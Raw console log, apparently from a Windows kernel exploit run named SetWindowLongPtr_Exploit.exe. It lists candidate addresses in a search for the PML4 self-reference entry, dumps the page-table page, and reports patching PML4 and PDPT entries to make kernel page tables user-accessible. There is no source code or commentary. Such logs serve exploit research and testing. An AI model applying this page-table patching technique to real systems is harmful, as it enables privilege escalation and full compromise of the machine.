Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...

                                                                                                                         Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC400 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC410 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC420 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC430 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC440 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC450 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC460 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC470 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC480 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC490 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC4F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC500 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC510 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC520 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC530 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC540 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC550 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC560 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC570 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC580 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC590 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC5F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC600 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC610 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC620 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC630 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC640 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC650 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC660 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC670 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC680 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC690 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC6F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC700 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC710 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC720 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC730 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC740 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC750 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC760 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC770 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`.
000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8......
000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8......
000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?....
000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............
000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?.............
000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5.....
000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G.....
000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......
000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............
000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....
000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............
000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............
000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......
000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@..............
000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......
000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......

+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
